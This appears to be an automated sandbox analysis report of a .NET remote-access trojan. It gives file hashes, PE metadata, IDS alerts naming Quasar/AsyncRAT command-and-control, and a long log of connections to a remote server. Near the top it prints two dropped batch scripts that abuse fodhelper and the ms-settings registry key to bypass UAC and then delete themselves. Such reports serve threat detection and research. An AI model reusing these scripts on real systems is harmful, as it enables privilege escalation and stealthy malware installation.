                                        SSDEEP:6:0mRmsERKtpIpGj5t6qUEioB1ERSGPUwknaZ5IBAtNQDNB1ERSGFPC4aDzyL6t2r1:rosERKXgIdERSgXrHIBA4DBERSSPqzw1
                                        MD5:6707B11BBBCA158FEFA9282219BB2C46
                                        SHA1:643DB9D4609BEBB11469171ABE6ADCBA6B31A5C8
                                        SHA-256:594104979020617468418F22372187074303FD9CE023EF34659820505B8BA434
                                        SHA-512:2625D675CF7448E1D7356304335ECD23145A75D6BDCE36DE8DAF349E092638A65DB3C319ED2561DA6B5FB3A283F61EEBD423F6CFD85F16392D83D2572C44E5A4
                                        Malicious:true
                                        Preview:..@echo off..setlocal....set "regKeyPath=HKCU\Software\Classes\ms-settings\shell\open\command"....reg add "%regKeyPath%" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Client.exe" /f..reg add "%regKeyPath%" /v "DelegateExecute" /f....start fodhelper.exe....timeout /t 2 /nobreak > nul..reg delete "%regKeyPath%" /f....start /b "" cmd /c del "%~f0"....endlocal..exit /b
                                        Process:C:\Users\user\Desktop\Dd5DwDCHJD.exe
                                        File Type:ASCII text, with CRLF line terminators
                                        Category:dropped
                                        Size (bytes):401
                                        Entropy (8bit):4.9261357217003265
                                        Encrypted:false
                                        SSDEEP:12:rosERKXgIMg08ERSZ/ERSgXrHIBJDBERSSPqzw1IhDg08ERSlig:roGXKa/YUDvE2alV
                                        MD5:7D0AB3E473E307076972E67134EADF4C
                                        SHA1:E703A39E96F905B65B340B8DC13ACC2F900BB6B1
                                        SHA-256:32D20E94A0C69B70B38CE7EB877AD11FABD2FCA26C042BB7F11A1C2A24F74447
                                        SHA-512:0B0303F648CDA846EA8832172767B6304DC09DD1C32660DA0F5186A82DC75FF6E6826BD4A79A2C1A301E675AE255684DEBF4991A290CFE645B51458E87C367B0
                                        Malicious:false
                                        Preview:..@echo off..setlocal....set "regKeyPath=HKCU\Software\Classes\ms-settings\shell\open\command"....reg delete "%regKeyPath%" /f....reg add "%regKeyPath%" /ve /d "C:\Users\user\AppData\Roaming\$77-cmd\Install.exe" /f..reg add "%regKeyPath%" /v "DelegateExecute" /f....start fodhelper.exe....timeout /t 2 /nobreak > nul..reg delete "%regKeyPath%" /f....start /b "" cmd /c del "%~f0"....endlocal..exit /b
                                        Process:C:\Windows\System32\timeout.exe
                                        File Type:ASCII text, with CRLF line terminators, with overstriking
                                        Category:dropped
                                        Size (bytes):55
                                        Entropy (8bit):4.5991860770036785
                                        Encrypted:false
                                        SSDEEP:3:hYF8AgARcWmFsFJQZaVy:hYF/mFSQZas
                                        MD5:471500D11DAF370CB75C597A4B1A7654
                                        SHA1:1AC2D4BDA1A30E09287F680C2AD75C577B096898
                                        SHA-256:C751BAFF37E4DC361F2C77BCC6B356159CC6178D1642244CBCD764A8DDE409B9
                                        SHA-512:DB81C5CE33D78E5618F41738129B5E623300CEFF188D99E7173E4E524107EEDED4C3BE2F15AC4715D3D10EAC23E39841978BBD42326E5C4E016A2B938C37A855
                                        Malicious:false
                                        Preview:..Waiting for 2 seconds, press CTRL+C to quit ....1.0..
                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit):6.078613024479684
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name:Dd5DwDCHJD.exe
                                        File size:3'268'096 bytes
                                        MD5:6d6c9c719e2f757442374af378c343a7
                                        SHA1:a58a2aa6dae2dbdf64472614985cac2adce4eddb
                                        SHA256:444c97f6db0626069965d9e4ddb4bf315326954c51b123b3dc7d64084e7fb646
                                        SHA512:a3ef795e64b1d43ca300da97abc7d211e5987064c1c7cafa7a1dadcd1cb35902fb230f5b8e9a008ced4bc1d33573403bad2d99a4ccca9b6b749355110eb10210
                                        SSDEEP:49152:HwElUPhZwv68DkG17WlqTz5oqM/p7vGJfAHdkTHHB72eh2NT:HwYUPhZwv68DkG17WlqTzeqM/p6t
                                        TLSH:4BE55B0437F85E33E57BE673D1B0941667F0F82AF363EB1B6581A67A1C93B5088016A7
                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.... hg..................1...........1.. ........@.. .......................@2...........@................................
                                        Icon Hash:90cececece8e8eb0
                                        Entrypoint:0x71ed1e
                                        Entrypoint Section:.text
                                        Digitally signed:false
                                        Imagebase:0x400000
                                        Subsystem:windows gui
                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                        Time Stamp:0x676820E8 [Sun Dec 22 14:23:36 2024 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version:
                                        OS Version Major:4
                                        OS Version Minor:0
                                        File Version Major:4
                                        File Version Minor:0
                                        Subsystem Version Major:4
                                        Subsystem Version Minor:0
                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        add byte ptr [eax], al
                                        NameVirtual AddressVirtual Size Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x31ecc80x53.text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x3200000xa3c.rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x3220000xc.reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                        .text0x20000x31cd240x31ce0061c26eb3a56aa61ee899e8e623c17651unknownunknownunknownunknownIMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                        .rsrc0x3200000xa3c0xc0021ff5d9aeccd97851790503fd7cc302cFalse0.3525390625data5.265085012255726IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc0x3220000xc0x20055f4c511ac38a8c1f5a730921c87e94dFalse0.044921875data0.10191042566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                        RT_VERSION0x3200a00x2c4data0.4364406779661017
                                        RT_MANIFEST0x3203640x6d7XML 1.0 document, Unicode text, UTF-8 (with BOM) text0.40319817247287265
                                        DLLImport
                                        mscoree.dll_CorExeMain
                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                        2025-01-01T05:57:09.322571+01002027619ET MALWARE Observed Malicious SSL Cert (Quasar CnC)1193.31.28.1814004192.168.2.449731TCP
                                        2025-01-01T05:57:09.322571+01002035595ET MALWARE Generic AsyncRAT Style SSL Cert1193.31.28.1814004192.168.2.449731TCP
                                        TimestampSource PortDest PortSource IPDest IP
                                        Jan 1, 2025 05:57:04.061592102 CET4973080192.168.2.445.83.244.141
                                        Jan 1, 2025 05:57:04.066601992 CET804973045.83.244.141192.168.2.4
                                        Jan 1, 2025 05:57:04.066706896 CET4973080192.168.2.445.83.244.141
                                        Jan 1, 2025 05:57:04.067773104 CET4973080192.168.2.445.83.244.141
                                        Jan 1, 2025 05:57:04.072586060 CET804973045.83.244.141192.168.2.4
                                        Jan 1, 2025 05:57:04.685983896 CET804973045.83.244.141192.168.2.4
                                        Jan 1, 2025 05:57:04.740004063 CET4973080192.168.2.445.83.244.141
                                        Jan 1, 2025 05:57:08.335727930 CET4973080192.168.2.445.83.244.141
                                        Jan 1, 2025 05:57:08.635449886 CET497314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:08.640389919 CET400449731193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:08.640873909 CET497314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:08.653297901 CET497314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:08.658092022 CET400449731193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:09.290640116 CET400449731193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:09.290661097 CET400449731193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:09.290873051 CET497314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:09.317305088 CET497314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:09.322571039 CET400449731193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:09.502640009 CET400449731193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:09.693068981 CET497314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:10.755537987 CET497314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:10.760555029 CET400449731193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:10.760662079 CET497314004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:14.365442991 CET497334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:14.370387077 CET400449733193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:14.370462894 CET497334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:14.371066093 CET497334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:14.375890017 CET400449733193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:15.011060953 CET400449733193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:15.011780977 CET497334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:15.012751102 CET497334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:15.016582012 CET400449733193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:15.017674923 CET400449733193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:15.017832994 CET497334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:18.365326881 CET497344004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:18.370225906 CET400449734193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:18.370301962 CET497344004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:18.370583057 CET497344004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:18.375428915 CET400449734193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:18.990139008 CET400449734193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:18.993341923 CET497344004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:18.993341923 CET497344004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:18.998182058 CET400449734193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:18.998415947 CET400449734193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:18.999627113 CET497344004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:22.569411993 CET497404004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:22.574261904 CET400449740193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:22.575186968 CET497404004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:22.579317093 CET497404004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:22.584116936 CET400449740193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:23.192033052 CET400449740193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:23.192794085 CET497404004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:23.197592020 CET400449740193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:23.221518040 CET497404004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:23.226558924 CET400449740193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:23.229650021 CET497404004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:26.506046057 CET497424004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:26.511070013 CET400449742193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:26.511159897 CET497424004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:26.511457920 CET497424004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:26.516246080 CET400449742193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:27.142672062 CET400449742193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:27.146542072 CET497424004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:27.147542000 CET497424004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:27.151374102 CET400449742193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:27.152607918 CET400449742193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:27.152667046 CET497424004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:30.771599054 CET497434004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:30.776757956 CET400449743193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:30.776864052 CET497434004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:30.777231932 CET497434004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:30.782001019 CET400449743193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:31.392684937 CET400449743193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:31.393234968 CET497434004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:31.394085884 CET497434004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:31.398133039 CET400449743193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:31.399149895 CET400449743193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:31.399204016 CET497434004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:35.146599054 CET497444004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:35.151526928 CET400449744193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:35.151598930 CET497444004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:35.151865005 CET497444004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:35.156677961 CET400449744193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:35.791385889 CET400449744193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:35.791990995 CET497444004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:35.792968035 CET497444004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:35.796807051 CET400449744193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:35.797961950 CET400449744193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:35.798012018 CET497444004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:39.361212015 CET497454004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:39.366209984 CET400449745193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:39.366314888 CET497454004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:39.413645029 CET497454004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:39.418498993 CET400449745193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:39.985196114 CET400449745193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:39.985786915 CET497454004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:39.986721039 CET497454004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:39.990653038 CET400449745193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:39.991728067 CET400449745193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:39.991781950 CET497454004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:43.553164005 CET497464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:43.558136940 CET400449746193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:43.561701059 CET497464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:43.563754082 CET497464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:43.568566084 CET400449746193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:44.200710058 CET400449746193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:44.201407909 CET497464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:44.202384949 CET497464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:44.206245899 CET400449746193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:44.207475901 CET400449746193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:44.207518101 CET497464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:47.631046057 CET497474004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:47.635947943 CET400449747193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:47.636025906 CET497474004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:47.636312008 CET497474004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:47.641052961 CET400449747193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:48.255856991 CET400449747193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:48.256414890 CET497474004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:48.257368088 CET497474004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:48.261220932 CET400449747193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:48.262527943 CET400449747193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:48.262582064 CET497474004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:51.818608999 CET497484004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:51.823554039 CET400449748193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:51.823745012 CET497484004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:51.823925972 CET497484004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:51.828696966 CET400449748193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:52.444901943 CET400449748193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:52.445616007 CET497484004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:52.446579933 CET497484004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:52.450479984 CET400449748193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:52.451756001 CET400449748193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:52.451814890 CET497484004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:55.787630081 CET497494004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:55.792629004 CET400449749193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:55.792732954 CET497494004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:55.793005943 CET497494004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:55.797847033 CET400449749193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:56.426650047 CET400449749193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:56.427287102 CET497494004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:56.428390980 CET497494004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:56.432071924 CET400449749193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:56.433373928 CET400449749193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:56.433424950 CET497494004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:59.365585089 CET497514004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:59.370533943 CET400449751193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:59.373718977 CET497514004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:59.374049902 CET497514004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:59.378860950 CET400449751193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:59.992435932 CET400449751193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:57:59.994391918 CET497514004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:59.995402098 CET497514004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:57:59.999244928 CET400449751193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:00.000350952 CET400449751193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:00.001559019 CET497514004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:02.687097073 CET497644004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:02.691987038 CET400449764193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:02.692065954 CET497644004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:02.709929943 CET497644004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:02.714684963 CET400449764193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:03.310291052 CET400449764193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:03.311059952 CET497644004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:03.312369108 CET497644004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:03.315867901 CET400449764193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:03.317397118 CET400449764193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:03.317456961 CET497644004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:05.693727016 CET497844004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:05.698576927 CET400449784193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:05.698664904 CET497844004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:05.698858976 CET497844004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:05.703581095 CET400449784193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:06.311429977 CET400449784193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:06.312316895 CET497844004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:06.313280106 CET497844004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:06.317169905 CET400449784193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:06.318193913 CET400449784193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:06.318247080 CET497844004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:08.427967072 CET498034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:08.432842016 CET400449803193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:08.432919979 CET498034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:08.433216095 CET498034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:08.438010931 CET400449803193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:09.061068058 CET400449803193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:09.061522007 CET498034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:09.062426090 CET498034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:09.066394091 CET400449803193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:09.067444086 CET400449803193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:09.067507982 CET498034004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:10.740483999 CET498194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:10.745273113 CET400449819193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:10.745388031 CET498194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:10.745572090 CET498194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:10.750432014 CET400449819193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:11.356995106 CET400449819193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:11.358062029 CET498194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:11.358933926 CET498194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:11.362874985 CET400449819193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:11.363877058 CET400449819193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:11.363938093 CET498194004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:12.833333015 CET498334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:12.838192940 CET400449833193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:12.838267088 CET498334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:12.838469982 CET498334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:12.843301058 CET400449833193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:13.461616039 CET400449833193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:13.462239981 CET498334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:13.463334084 CET498334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:13.467031002 CET400449833193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:13.468327999 CET400449833193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:13.468368053 CET498334004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:14.834356070 CET498464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:14.839190960 CET400449846193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:14.839296103 CET498464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:14.839546919 CET498464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:14.844342947 CET400449846193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:15.452366114 CET400449846193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:15.453059912 CET498464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:15.454000950 CET498464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:15.457843065 CET400449846193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:15.461815119 CET400449846193.31.28.181192.168.2.4
                                        Jan 1, 2025 05:58:15.461863041 CET498464004192.168.2.4193.31.28.181
                                        Jan 1, 2025 05:58:16.693641901 CET498624004192.168.2.4193.31.28.181
